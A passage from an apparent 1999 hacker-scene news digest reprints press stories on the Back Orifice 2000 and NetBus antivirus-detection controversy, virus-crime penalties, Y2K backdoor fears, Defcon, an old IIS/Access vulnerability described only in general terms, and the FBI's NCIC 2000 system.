‘You can’t use that product’ ... You’ve got Symantec saying
you shouldn’t use NetBus Pro. That’s the classic definition of
an anti-competitive act.”
Members of the Cult of the Dead Cow, which authored
Back Orifice, agree with Rubin’s premise. Back Orifice is
also removed by anti-virus programs.
“It’s a huge problem for anybody who wants to use our
product legitimately that they have to
completely disable their AV software to use BO2K,”
said a member calling himself Tweety Fish.
“We’ve talked about suing them, but since our product is
free, and we gain no income from what we do, the legal fees
would probably be prohibitive. From what we can tell, we
would have a pretty good case.”




Anti-virus companies say while this might be an
interesting intellectual debate, it would be a silly court case.
NetBus is a hacking tool, they say, designed to run on
victims’ machines without their knowledge. The lawsuit
would be frivolous, as it would be difficult to persuade a judge
that NetBus is a legitimate software product.
“Our policy would be if they were to release a version
which very clearly identifies itself as NetBus every time it
ran, then we would not detect that,” said Stephen Trilling,
director of research at Symantec’s Antivirus Research
Center. Further, he said, Norton users are given an option
when NetBus is detected — they can leave the software on
their machine.
He denied Symantec would ever consider using
Norton’s AntiVirus program to disable a competitive product.
“We’re in the business of protecting customers,” he said.




The issue does have some shades of gray — when
NetBus was released in February, Data Fellows’ F-Secure
product initially didn’t detect the new NetBus, deferring to
the notion it was a commercial product. But later, after
customers complained, NetBus detection was added.
“Net administrators I know would get fired for using
NetBus,” said Dan Takata, spokesman for Data Fellows. “It
can be used for good, but it’s inherently a hacker program.”
That’s just not so, complains Spence, who says more
than 700,000 copies of the program have been downloaded,
and about 2,000 people have registered copies of the
program. He says several corporations, and even the U.S.
Air Force, are interested in using NetBus as an administration
tool.
“I’m optimistic that once we raise the issue, legal
departments [at AV companies] will act,” says Rubin.
“Every day this costs money to NetBus Pro.”


@HWA

04.0 Spreading Viruses Equal A Terrorist Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by nvirB
Andre Gauthier, chairman of the Information Technology
Association of Canada thinks that people who create
and or spread viruses should be treated as terrorists
and should have stiffer penalties applied to them. The
ITAC recently requested the Canadian government
increase the penalties for these types of crimes.

Edmonton Journal
http://www.edmontonjournal.com/technology/stories/990716/2615262.html


Get tough on computer-virus makers,
Ottawa told
Rogue programs that play havoc with computer
files seen as equivalent to a terrorist attack

Philip Demont
Southam Newspapers; Southam News

Ottawa has to get tougher with hackers who send
file-destroying computer viruses over the Internet, the
industry association representing Canada's computer
industry said Thursday.

The mischievous makers who devise programs that
destroy corporate computer files and cause entire
high-tech systems to collapse are getting away with a
slap on the wrist for a crime that is costing the
Canadian economy millions annually, said Andre
Gauthier, chair of the Information Technology
Association of Canada and senior vice-president of LGS
Group Inc.

"
Too many people consider these things as funny. But
sending a virus is just like launching a terrorist attack
on a company," Gauthier said.

ITAC, which represents 1,300 Canadian software and
hardware companies, sent a letter Thursday to federal
Justice Minister Anne McLellan asking her to increase
the penalties for this kind of crime and to work more
closely with other law enforcement agencies globally to
track down virus makers.

Over the past several months, the Chernobyl, Melissa
and Worm-Explore.Zip viruses made headlines
internationally as they attacked the computer systems
of corporations and government agencies in many
countries.

Viruses are programs that enter a computer system
through the e-mail or other external links and then
cause havoc in the network, everything from exploding
fireworks on a person's computer screen to the
elimination of stored files on the system's hard drive.

In many cases, these hackers are people who enjoy
the intellectual challenge of writing. In other situations,
they are only after the publicity these viruses can
receive, causing people to treat these crimes as less
dangerous.

"
But (in the information age), a crime no longer requires
a .45-calibre Magnum. We have to deal with these
things in a far more serious manner. They do a lot of
damage," said Robert Lendvai, vice-president of
marketing at OLAP@Home Inc., an Ottawa-based
software programmer.

For instance, one Ottawa public relations firm had to
close its doors for one day to repair the damage from
the Melissa virus, he said.

ITAC's Gauthier figured Canadian corporations and
governments lose $100 million annually because of
these computer bugs. That figure was extrapolated
from the $1-billion US loss estimated to American
corporations derived from an earlier U.S. study.

Companies are getting help in the form of more
sophisticated virus detection programs, now "
a basic
protection" for any smart firm, said David Lynch,
vice-president of sales and marketing of KyberPASS
Corp., an Ottawa-based electronic commerce software
maker.

These detection programs generally work by looking for
indicators within a corporate computer system that
change for an unexplained reason. In that case, the
program will send a warning that you may have a
problem.

"
But viruses are always going to be with us," he said.

KyberPASS was hit by three viruses in the past year,
two of which entered the system through the
company's e-mail and one when someone in the
corporation downloaded an outside file, Lynch said.

"
It's computer vandalism. Some of it is paint on the
walls. And some is like throwing eggs at the door," he
said.

@HWA


05.0 Y2K Bug Fixes May Cause Other Problems
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid
Sure, the programmers who are busy patching up old
Cobal code to correct the massive Y2K problem may
leave in their own backdoors. Of course that is possible
but how widespread is this problem really? Is the claim
of $1 Billion dollars lost accurate or just FUD? I guess
there is no way to really know for sure.

MSNBC
http://www.msnbc.com/news/290746.asp


More fud and sensationalism....;

Beware the millennium bug repair
The people hired to root out the Y2K bug could give themselves
the keys to billions of corporate dollars
By Jim Miklaszewski
NBC NEWS CORRESPONDENT

WASHINGTON, July 16 — Security experts believe that
computer fraud, linked directly to the so-called
Year 2000 computer bug, will cost America’s big
business big money. In fact, one firm predicts that
in a single computer theft, some American
business will lose $1 billion. It could potentially be
the biggest corporate heist in world history

“CLEARLY, SOMEONE is going to be hit on their
balance sheet pretty hard,” said Bob Mack, vice president of
the Gartner Group.
Ironically, the companies themselves may be hiring these
potential computer crooks without even knowing it. Most
major firms are using outside consultants to rid their computer
systems of any potential Y2K bugs.
But to do that, these consultants are given access to the
companies deepest, darkest, most sensitive computer secrets
and codes — leaving the companies and their computers
wide open to theft.
“They have to have access to your most critical
systems. You’re essentially giving them the keys to the
kingdom,” said Ira Winkler, chief of the president’s Security
Advisors Group.


The consultants, it’s feared, can insert their own codes
into a company computer — trapdoors — that would permit
them to hack back into the system at will.
“They’re inserting malicious activity, if you will, into the
code that will allow them to do things that the code was
never allowed to do,” said Mike Higgins, of Para-Protect
Services, of Alexandria, Va.
Once inside, the computer thieves could electronically
steal money or the companies’ latest trade secrets, be it the
latest cure for cancer or design for a new sneakers,
potentially worth billions of dollars.
“Why do people hack into computers today in the
business world?,” Higgins said. “Because that’s where the
money is.” And global financial systems are largely
electronically connected now, and the interconnection is only
expected to increase.
“Y2K remediation, by definition, creates and increases
the opportunity for theft and fraud,” said Joe Pucciarelli, a
Gartner analyst, in a statement on the company’s advisory.
Advertisement



“Given the enormity of the Y2K task, the vast number of
people assigned to fix the problem, and the element of human
foibles, at least one significant theft is likely to occur in the
next five years,” Pucciarelli said.
Corporations must keep a close eye on staffers and
consultants working on Y2K projects, said Bob Mack,
another Gartner analyst, in an interview.
“The point we’re making is that there are things
corporations can do to limit fraud,” Mack said. All Y2K
bug-fixing efforts should be audited by third parties if
possible, and detailed records should be kept on all Y2K
projects.

Once planted, these back doors could go undetected
forever — leaving some companies vulnerable long after the
Y2K New Year’s celebration.

Mario Seminerio of ZDNN contributed to this report.


@HWA


06.0 Security Fears are Slowing UK E-Commerce
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Fears over the lack of security on the internet is slowing
the progression of e-commerce in the UK said attendees
of TheEcademy an advisory group to the British
government. This groups feels that these fears over the
lack of security on the net are unfounded and
misplaced. One attendee was quoted as saying "
There is
no security problem." What world do these guys live on?

Tech Web
http://www.techweb.com/wire/story/TWB19990716S0018

Scary Security Stories Hinder
E-Commerce
(07/16/99, 4:06 p.m. ET)
By Madeleine Acey, TechWeb

LONDON -- Unwarranted hype over the
security risks of e-commerce has led to
misplaced fear about setting up in Internet
business.

This was the view of IT vendors, analysts, and lawyers
who gathered in London on Thursday to create an
advisory document for the U.K. government on how to
spur reluctant British businesses into e-commerce.

The 50-member group, all part of TheEcademy -- an
e-commerce education forum, also said regulation would
be an inhibitor and had already held back progress.

"
There is no security problem," said Frederick Wilson of
Lloyds TSB banking group. "
There's only one problem --
people don't understand. We have to convince customers
it is secure."

Other delegates said people let technophobia cloud the
issue and needed to realize e-commerce was no more
insecure than any other type of business. "
All the
security and payment issues we have, have always
existed in business," said one. "How secure is your shop
or your head office?" said another. EDI works globally
and has been around for years without issues, a third
pointed out.

Microsoft U.K. e-commerce business manager Peter
Bell said Visa was the "
biggest proponent" of scare
stories. "
They say there's 45 percent fraud on the
Internet," he said.

But online businesses like Expedia sold $1 million worth
of travel tickets last year without one security incident,
said Durlacher European Internet Analyst Sarah Skinner.

A show of hands found most of the group felt the U.K.
telecom industry and its regulation -- or lack of regulation
-- was holding back e-commerce.

Bell said British Telecommunications' contracts only let
customers run data at 64K over their lines. "
People
should ignore it, let BT sue you," he said.

Government regulation is supposed to ensure the
near-monopoly BT operates fairly.

Many agreed e-commerce worked best when
governments didn't try to legislate for it. "
Our objective
would be to take as much regulation out of the equation
as possible," said TheEcademy chairman Thomas Power.

Russell Loarridge suggested the government publish a
code of practice to prevent spamming -- people would
only receive marketing e-mail if requested. Another
delegate said the EU - led by a British Labor politician --
had already voted for the opposite.

The group agreed the IT industry was partly to blame for
resistance to e-commerce as it used language that was
alien to many businesses.

They said the success stories -- and how they were
achieved -- should be publicized to counteract the fear of
credit card details being stolen, payments not being made,
and systems falling over.

"
We need people with the business experience to be
visionaries to encourage the same sort of transition [as
when businesses first moved from manual processes to
computer systems]," one member of the discussion forum
said.

"
People want to know, how has someone else done it,"
another offered, suggesting TheEcademy publish
boilerplate guides to adopting e-commerce.

A working document would be produced from the
group's meeting, Power said, and be presented to the
Department of Trade and Industry.

@HWA

07.0 More Defc0n than you can shake three sticks at
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Forbes:http://www.forbes.com/tool/html/99/jul/0716/feat2.htm

Defcon Live!

By Adam L. Penenberg

ildog, a member of the hacker group Cult
of the Dead Cow, is lounging in his hotel
suite, a smile smeared on his face. Being
Las Vegas in July, the temperature outside
is 100 degrees, but Dildog is air-conditioned
cool. The unveiling of his latest software
upgrade for Back Orifice--a not-so-subtle dig
at Microsoft's Back Office--was a success, a
raucous party that had more in common with a
heavy metal concert than a software release.

A gaggle of groupies, most of them in their
twenties and dressed in noir black, with
tattoos, piercings and scraggly hair, wait for
him. They sit cross-legged on the carpet,
availing themselves to a well-stocked minibar
piled high with bottles of vodka, bourbon,
whiskey.


Cult of the Dead kicked off
the conference with a
laser-light show, culminating
in a deafening electronic
moo sound.



Of the 3,000 hackers, crackers, geeks, "
scene
whores" (hacker groupies), computer security
professionals, journalists, undercover cops and
federal agents who attended this year's Defcon
hacker convention, 2,000 of them crammed
into a conference room at the Alexis Park Hotel
to watch the "
BO2K" release. Last year, Cult of
the Dead Cow had chosen Defcon to release
the first version of its Back Orifice. Written by
fellow Cult member Sir Dystic, it works on
Windows 95 and 98 machines by secretly
creating a backdoor so that a remote user can
control all functions on those computer. The
upgrade Dildog coded is designed to work with
networks that run on Windows NT, and it hides
itself extremely well.

While software makers, computer security
companies, antivirus makers and law
enforcement say the release of BO2K is just a
way for hackers to legitimize illegal computer
intrusions, Dildog claims he is just trying to
point out potential problems with Microsoft's
software. Computer security companies are
"
afraid to admit that their detection system is
horribly and possibly irreparably flawed," he
says. "
[They] give people the impression their
software 'raises the bar' against the average
hacker. Unfortunately, this also fools people
with really critical networks into thinking t

  
hat
this software is sufficient to protect them.
People trusting this stuff to protect them from
Trojan horses are in for a surprise."

Cult of the Dead Cow members didn't come all
the way to Las Vegas to disappoint, and they
didn't. They kicked off the conference with a
laser-light show, culminating in a deafening
electronic moo sound. The crowd roared. Then,
while Dildog and his associates explained their
don't-blame-us-if-Microsoft-products-suck
philosophy, a CD-ROM label was projected on
the wall behind them, a cow head spinning and
spinning.

At the end of the presentation, Cult members
flung some two dozen CD-ROMS containing the
Back Orifice update. The crowd surged forward.
Antivirus makers and computer security
company reps watched closely, hoping to later
corral someone with a copy. The first one to
crack the program would win bragging rights,
their names in a press release, perhaps even a
mention in some magazine or newspaper
articles as heros who thwarted the evil
intentions of the Cult of the Dead Cow hacker
gang.


n employee of ISS, the big-time
computer-security company based in
Atlanta, Ga. threw himself into the mob
and somehow snagged a copy. Within 24
hours, the company would crack parts of the
program and release an application that could
identify it.

At the time, Dildog didn't know this, and even if
he had he wouldn't have cared. In an earlier
Internet conversation, an ISS employee
approached him and asked how much of a bribe
it would take for him to pass the company an
advance copy of the software, he claims. As a
joke, the Cult sent back a note saying it would
take $1 million and a monster truck, the idea
they ostensibly got from "Hack Heaven," the
sham article written by former New Republic
associate editor Stephen Glass. ISS denies the
company ever offered money for the software.


Some hackers thought the
spectacle undermined
Dildog's credibility and made
him look arrogant.



Although ISS has been more than happy to
play up the fact that it can detect the
software, Dildog says he fully expected that
companies would not only reverse engineer it,
they would soon come up with a removal tool.
That is why he released his software as "open
source." That means hackers the world over
can tweak the code to suit their needs.

For every new version that hits the Net,
computer security companies will have to
create new ways to counter it. Although
antivirus makers have been pretty good at
picking up polymorphic versions of the same
program, it will be interesting to see what the
overall impact of BO2K will be. Often, network
administrators forget to apply the latest
versions of antivirus software, or incorrectly
configure parts of their network, leading to
holes that would enable BO2K to fester.

Already, BO2K has made it on to some hacker
sites, bugs and all. Some users say the
program has a tendency to crash and some
files were improperly coded. But in the next
couple of weeks or so, Cult of the Dead Cow
plans to fix any glitches and post the new and
improved program on its web site. From
previous experience, Dildog knows that BO2K
will then spread like a virus, morphing into
perhaps dozens of different versions.

The group claims it counted more than 300,000
downloads of the original Back Orifice, which
ran solely on Windows 95 and 98 and was
spread primarily by E-mail attachment. Who
knows how many other copies were spread
friend to friend, hacker to hacker, "cracker" to
victim?

Back in his hotel suite, Dildog's cool is slightly
interrupted. When told some hackers who had
attended his BO2K launch thought the
spectacle undermined his credibility and made
him look arrogant, he sniffed, "I never said I
wasn't arrogant. Besides, why shouldn't every
software release be like a rock concert?"


(Though Mirco$crap did that in their presentations? - Ed)

@HWA

08.0 How to Look Like a Hacker
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Some cool pictures in a rather mainstream place that
attempts to cover what it thinks is Hacker Fashion.
There are pictures from Defcon of Sir Dystic, Dark
Tangent, Niki, Redrasta, Dr. Byte, and the whole cDc
crew. Pity they missed my blue hair.

Las Vegas Weekly
http://www.lasvegasweekly.com/departments/07_14_99/fashion_defcon.html


How to be a hacker ...
or at least look like one

Written and photographed by Anonymous

I confess. In my younger daze I was a hacker. It was easier
then. We worked on paper terminals that we accessed by
sneaking into a local university library. We'd change grades,
write stupid little programs and screw things up. We really
didn't know what rules we were breaking. At that time,
neither did the authorities.

Today's hackers are a different lot. They are really savvy
about the rules and how the game is played. Depending
upon your own definition of evil, they are either on the dark
side or the good side. It's a perfect yin yang.

Wondering what today's generation of hackers looked like I
went down to Defcon VII held last weekend here in Vegas.
What I saw didn't surprise me. In fact it scared me. The
following is a checklist on how to at least pretend you're a
hacker.

- Black t-shirts with esoteric statements, or corporate
- logos (but only if the shirt is free), or those
oh-so-comfy thrift-store clothes.
- Black t-shirts with esoteric statements, or corporate
logos (but only if the shirt is free), or those
oh-so-comfy thrift-store clothes.
- Sunglasses to protect your eyes against that big
- bright yellow thing that is in the sky during what is
called "daylight hours".
- Black tribal tatoos to contrast against your skin made
- pasty white from years of not going out into the sun.
- A proper diet of pizza, beer, cigarettes and loads of
caffeine.
- A cold hard stare for anyone trying to take your
picture because you're trying to remain anonymous
even though the authorities who would be interested
in your picture already have really good snapshots of
you. A quick draw to cover your face is also
necessary.
- Strange jewelry, shoes, and backpacks.
- Icons of the dead and almost dead.
- That retro 20th century look.
- Anything that makes Bill Gates look like the devil.
- Come up with a cool cyber name like Death Veggy.

@HWA

09.0 AV Vendors Still Scrambling Over BO2K
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



contributed by Space Rogue
Everyone wants a piece of the Anti BO2K press pie.
Both Aladdin Knowledge Systems and BindView
Development have announced products that claim to
protect users from the malicious use of Back Orifice
2000. The BindView product looks like nothing more than
a signature ID program, useless against an open source
application such as BO2K. The Aladdin product actually
looks interesting claiming to trap BO2K and other
malicious email attachments in a 'sandbox' and detecting
attempts to modify system files. This method should
protect against the numerous mutations that will
undoubtedly appear.

Excite News - BindView
http://news.excite.com/news/bw/990715/tx-bindview

BindView Development - BO2K Advisory
http://www.bindview.com/security/advisory/bo2K.html

Excite News - Aladdin
http://news.excite.com/news/bw/990713/wa-aladdin-knowledge

eSafe - Aladdin's Security Product
http://www.esafe.com/

10.0 The Back Orifice 2000 Controversy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reprinted from HNN's Buffer Overflow with Eric's kind permission.

By: Eric Ruppenthal

Symantec, producers of Norton Anti-virus, along with many other
anti-virus producing companies announced recently that it was
classifying Back Orifice 2000 as a Trojan and or virus. This is a
concerted effort to bar the competition of Cult of the Dead Cow in the
network administration tool field. By using their anti-virus programs
to keep computer users from using BO2K, these companies are
engaging in unfair business tactics to keep a legitimate program
from stealing the profits of their network administration tool
programs. This creates a serious anti-trust problem.

Back Orifice 2000 was produced by Cult of the Dead Cow (cDc) as an
actual legitimate tool to be used to remotely administer Microsoft OS
computer networks. It was introduced in Las Vegas on July 11, at
DefCon 7. Since its official release to the public on July 14, every
effort has been made to define this program not as a evil tool, but
as something to be used in the real world of business. The program
is free to any U.S. citizen who plans no exportation of it because of
the encryption contained in the program.

Many of the companies that produce anti-virus programs also deal in
the network administration tool arena. The applications these
companies produce are similar in functionality to BO2K with the
difference being cDc offers their program free of charge. The
companies see this factor as having the potential to seriously
undermine their profit margins. So what do they do? They use a
commonplace tool to remove this program as a threat; knowing full
well that millions of computer systems in this country run anti-virus
programs, including the networks this tool could be used on. They
use this to their advantage by having it detect and label BO2K as a
virus. This blatant attempt at monopolizing the network admin field
thus blocks most attempts by any network administrator from using
BO2K in a legitimate capacity without having to compromise virus
protection.

Symantec produces a program called PcAnywhere. Another company
that is a close ally of Symantec is Microsoft. Microsoft is currently
involved in a government anti-trust suit. Microsoft also makes a
network administration tool called Systems Management Server that
is integrated within the Microsoft BackOffice Suite. BO2K uses a little
known hole that Microsoft deliberately placed in its OS source code to
run in a stealth mode. Many of the enterprise management tools
such as SMS from Microsoft do stealth remote control. Read the
comparison of BO2K, Norton's PcAnywhere and Compaq's Carbon
Copy 32 at http://www.bo2k.com/comparison.html

They all have a silent install option and they all have silent remote
control. SMS even has a configurator much like the BO2K wizard to
configure the agent before sending it to the target machine. The
technology of stealth monitoring and control was there way before
BO2K. But these companies would have you believe that BO2K is the
only tool inherently destructive towards computer systems because it
is made by a well-known group of non-commercial programmers.
What cDc has done is put it in everyones face and built a
technologically superior solution that is free and open source. Any
program has the potential to be misused. If there is a way for
someone to exploit a hole in your computers defenses, it will be
found.

Microsoft is fully aware of the problems associated with powerful
remote administration. Their SMS administration software has similar
problems, by their own admission. From their page describing SMS;
http://www.microsoft.com/smsmgmt/techdetails/remote.asp "Security
of all the operations that Systems Management Server allows you to
do on a client, remote control is possibly the most dangerous in
terms of security. Once an administrator is remote controlling a client,
he has as many rights and access to that machine as if he were
sitting at it. Added to this, there is also the possibility of carrying out
a remote control session without the user at the client being aware of
it." Microsoft's site goes on to say, "It is possible to configure a
remote control from a state where there is never any visible or
audible indication that a remote control session is under way. It has
been made this flexible due to customer demands ranging from one
end of the spectrum to the other. When configuring the options
available in the Remote Tools Client Agent properties, due notice
must also be taken of company policy and local laws about what level
of unannounced and unacknowledged intrusion is permitted."

According to a press release by cDc, "In the past, Back Orifice has
been used as a Trojan horse by script-kiddie crackers to annoy and
sometimes harm Internet connected Windows machines. This is a
fact of life with a tool that has the ability to be silently installed and
can perform administration without end-user intervention. This,
however, is not unique to Back Orifice. There are many Trojan horse
programs out there, and many legitimate remote administration
tools, that have the capability to perform quiet remote installations."
Their statement goes on to say, "We have designed Back Orifice
2000 to meet user demands and to provide the most powerful
remote administration available for the Microsoft Windows platform.
Many people don't like to see free software like Back Orifice being
used in replacement for expensive commercial products. So, they
throw around statements like 'the program is only a malicious tool',
and 'It has no legitimate purpose. The Microsoft Crypto API claims to
provide 'strong encryption'. Of course, if you don't have the source
code, you can't verify that this is true. We aren't taking that chance.
Back Orifice 2000 encryption is proven strong, and we're not afraid to
show you exactly how it's implemented."

cDc has produced a program that is to be used in a legitimate
business environment by a network administrator to aid in the
administration of the computers they manage. They want you to
know exactly how legit Back Orifice really is but these companies are
trying to prevent this freely available tool from being released by
using one of their own product line applications to suppress BO2K so
that another of their products can flourish. Both Symantec and
Microsoftís products stand to lose a good percentage of market
shares if BO2K were allowed to be released free to the public and
become a commonly used tool. All of these programs, not just BO2K,
can be detrimental to any computer system if used in the wrong
hands. BO2K must be given a chance to prove itself a legitimate tool
and taken off the virus definitions lists. The open-source model has
provided Back Orifice 2000 with a more than legitimate position in the
industry and Back Orifice 2000 will grow to encompass all of the
features of currently existing commercial remote administration tools.
Says a member of cDc; "We're dedicated to empowering people with
their technology."

Submitted by: Eric Ruppenthal
HFactorX International Organization


@HWA

11.0 Year Old IIS Hole Still Causing Problems
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
A major hole in IIS announced by Microsoft last year has
still not been patched by most customers. Eight lines of
code is all that is needed to take full control at the
system level of major popular web sites. The problem is
that under certain conditions a user can connect
directly to MS Access through IIS which then of course
gives the attacker full system privileges.

MSNBC
http://www.msnbc.com/news/290621.asp

Microsoft - Old
http://www.microsoft.com/security/bulletins/ms98-004.asp

Microsoft - New
http://www.microsoft.com/security/bulletins/ms99-025.asp




MSNBC;

Year-old hole exposed big Web sites
Compaq, Dell, Compuserve and others failed to heed
Microsoft security warning and were left vulnerable
By Bob Sullivan
MSNBC

July 19 — A security expert was able to
demonstrate major vulnerabilities in big-name
Web sites last week, including Dell Computer
Corp., Compaq Computer Corp., PSINet,
Compuserve and Nasdaq-Amex. The
vulnerability, which was demonstrated to
MSNBC, was simple but potentially devastating.
It required as few as eight lines of computer
code but could have exposed personal
information, including credit card numbers.


THE HOLE WAS actually announced by Microsoft on
July 17 of last year — confirming a long-held suspicion that
even large-scale information technology departments are
having a tough time keeping up with the work required to
maintain Web site security.
The cat-and-mouse nature of security means Microsoft
and other software vendors regularly issue bulletins with
“patches” to security holes, or “exploits,” found and
announced by hackers. As such recipes for hacking into
sites make their way quickly through the hacking
community, Web site administrators must meticulously
follow each bulletin. In this case, many sites did not.
“It’s one thing when there’s a problem” said Russ
Cooper, who administers the popular NTBugTraq mailing
list. Cooper publicized the flaw on his list Monday morning.
“It’s another thing when companies know about something
for a year and haven’t done anything.... These companies
have just ignored Microsoft’s recommendation.”
The flaw was discovered a year ago, and Microsoft
published a "fix” and added it to the security checklist for
Windows NT administrators. (Microsoft is a partner in
MSNBC.)
A new flavor of the same problem was discovered last
week by Greg Gonzalez, vice president of Web services at
ITE Inc., which hosts several e-commerce sites. He says his
discovery meant that a hacker could write a simple
eight-line program and gain administrative access to Web
sites running Microsoft’s Internet Information Server Web
server software — with no user name or password
required.
Sites that followed Microsoft’s instructions from a year
ago would have been immune, but Gonzalez said about half
the sites he checked were vulnerable.


“With a lot of exploits you see ‘professional’ hackers
writing code,” he said. “This exploit does not require
anywhere near that level of expertise.”
This morning, Microsoft re-issued its security alert
about the problem “to serve as a reminder about this
vulnerability, to restate the threat and encourage system
administrators to evaluate their systems.”
At the center of the problem, according to Cooper, is
lack of due dilligence on the part of some companies to
protect consumers’ private information.
“Lots of companies went to the trouble of putting
together a privacy statement. That’s all well and good,” he
said, “But if companies don’t have an effective way of
dealing with patches, with problems, what good is a privacy
statement?”
The problem is much more complicated than that,
according to the chief technology officer at one of the
big-name Web sites that was discovered to be vulnerable.
“We get about 15-40 of these alerts every week,” the
CTO, who asked not to be identified, told MSNBC.
Despite staff who are dedicated to following up on security
issues, lower-priority problems can slip through the cracks.
“We’re not Fort Knox.... We rely on third parties to say
whether they are yellow or red situations.” He says
Microsoft downplayed the severity of the bug a year ago.
Several other companies impacted by this security flaw
declined comment. Spokespersons for Compuserve and
PSINet said no personal information is stored on their Web
sites, so there was no real danger to consumers. Compaq
would only confirm that its site had been vulnerable but said
the hole was patched after Microsoft security experts
contacted Compaq recently. A spokeman for Dell said
personal information was not at risk because such data is
password protected, encrypted, and stored “elsewhere on
its site.”


“The net of it is when an issue arises, we need to be
proactive to take care of our customers,”said Craig
Beilinson, a product manager for Windows 2000 at
Microsoft.
The security hole itself involves the use of Microsoft’s
database product, Access, in combination with its Web
server software, Internet Information Server (IIS). Instead
of connecting to a Web page in the traditional manner, a
malicious hacker can connect directly to the Access
database. From there, the hacker by default gains “system
privileges,” and using Visual Basic can execute any
command the Web administrator could. That would include
downloading a list of user names and passwords, and the
ability to connect to any other computer which feeds
information to the Web server — including a database of
credit cards and other personal information.
Gonzalez, who found the new method last week while
testing his own site for vulnerabilities, said the largest
e-commerce sites may have an added layer of security that
would have prevented easy access to critical data such as
card numbers — perhaps storing such numbers on a
different network, behind another user name and password.
“The top 10 e-commerce sites may or may not have an
additional layer,” he said. “But there’s a zillion other sites
that aren’t going to have additional layers in place.”


@HWA


12.0 NCIC 2000 Now Online
~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by DaFed
The FBI has announced a major new initiative in fighting
crime, the National Crime Information Center 2000. This
new system replaces the original NCIC, at a cost of
$183.2 million, which was used since 1967. The NCIC
2000 indexes and cross references several different
crime related databases such as those containing
information on stolen guns, deported felons, missing
persons and stolen vehicles. We sure hope that this
version of NCIC is more secure than the last one.

CNN
http://www.cnn.com/TECH/computing/9907/19/system.idg/index.html

FBI turns on new
crime-fighting system

July 19, 1999
Web posted at: 2:22 p.m. EDT (1822 GMT)

by Scott Tillett
From...



(IDG) -- FBI officials announced today that
they have successfully rolled out a massive
new computer system that state and local
law enforcement officials will use to fight
crime.

The new system, the National Crime
Information Center 2000 -- like the original
NCIC, which the FBI had used since 1967
-- allows crime fighters to search through 17 databases when investigating
crimes or questioning criminal suspects. The databases include information
on stolen guns, deported felons, missing persons and stolen vehicles, for
example.

NCIC 2000 will allow law enforcement officials with special hardware and
software to transmit suspects' fingerprints to confirm their identity and to see
if the suspects are wanted for other crimes. It also will allow the officials to
view mug shots to confirm identities -- a capability the original NCIC did not
have.

Law enforcement officers also can use
NCIC 2000 to identify relationships among
information in the databases. For example,
under the old NCIC, if someone stole a car
and a gun as part of the same crime and if a
law enforcement officer later stopped the
car thief on the highway, the officer could
use the system to find out easily that the car
had been stolen. But he would not
necessarily know that the car thief might
also have a stolen gun. NCIC 2000 shows
the connection, keeping related information
on a crime linked together, FBI spokesman
Stephen Fischer said.

The new NCIC 2000 also adds
name-search functionality. For example, a
search for the name "James" would return
alternate spellings, such as "Jim" or "Jimmy,"
Fischer said.

NCIC 2000 went online after years of escalating costs and congressional
finger-wagging. System architects originally envisioned NCIC 2000 costing
about $80 million, but the final price was $183.2 million, Fischer said. The
discrepancy between the original cost and the actual cost came in part
because contractors originally were "overly ambitious" when estimating the
project, Fischer said.

NCIC 2000 went live on July 11, but bugs in the system, as well as FBI
attention on the capture of suspected railroad killer Angel Maturino
Resendez, delayed the unveiling of the system, Fischer said. He added that
bugs in NCIC 2000 were fixed by Monday evening. The bugs related to
connectivity with the National Instant Criminal Background Check System,
which is used for approving gun purchases. That system draws on NCIC
2000 and other databases to approve or disapprove gun purchases.

FBI officials will hold the formal ceremony unveiling NCIC 2000 next month
in Clarksburg, W.Va. FBI turns on new
crime-fighting system

@HWA

13.0 E-commerce Increases Security Risk
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid
Companies engaged in e-commerce are 57 percent more
likely to suffer an information security breach than
those that don't do business online, according to a
survey published in ICSA Inc.'s Information Security
magazine. The survey found that companies conducting
business online are 57 percent more likely to experience
a proprietary information leak and 24 percent more likely
to experience an unwanted intrusion into their systems.

Information Security Magazine- 1999 Information Security Industry Survey
http://www.infosecuritymag.com/july99/charts.html


@HWA

14.0 Cyberspace Relatively Safe
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid
Obviously a story written without much research, John
Kroll claims that cyberspace is relatively safe. While his
article pretty much only covers fraud on eBay the
overall tone would give most people the wrong
impression of life in cyberspace.

Cleveland Live
http://www.cleveland.com/business/news/fm19kro.ssf

So far, cyberspace is reasonably safe

Monday, July 19, 1999

By JOHN KROLL
THE PLAIN DEALER

Robert J. Guest is one in a million. Or at least one in 10,000.

Guest, a 31-year-old Californian, pleaded guilty to fraud in a
federal court in California last week, according to
prosecutors. He admitted taking about $37,000 from bidders
over eBay Inc.'s Internet auction site but never delivering the
digital cameras, laptops and other merchandise he had
promised.

Sounds like another Internet horror story, right? Like all the
hackers who are compromising our nation's defense and the
Postal Service plan to start charging everyone who uses
e-mail.

Well, Internet auction fraud is like those threats - that is, it
exists rarely, if at all.

Almost every hack into a government computer has done
nothing worse than apply some electronic graffiti. There is no
government plan - that's none, zip, zero, zilch - to charge for
e-mail. And fraud in Internet auctions is hard to find.

Even though Thom Mrozek, a spokesman for the U.S.
attorney's office that prosecuted Guest, told Bloomberg
News that the case "demonstrates that the buyer needs to
beware, particularly in the anonymous realm of the Internet,"
he says this is not an epidemic. Guest's was only the second
prosecution in the country involving online auction fraud,
Mrozek said.

Of course, it could be the dirty dealing in the digital rooms of
eBay is just flying under the radar. No federal prosecutor's
going to go after some guy who rips off one or two buyers for
maybe $50. Don't even ask about using state laws or
small-claims court. As Parma Heights attorney Rodger A.
Pelagalli told Plain Dealer technology reporter Chuck
Melvin, if you get stung on eBay, your best weapon is likely
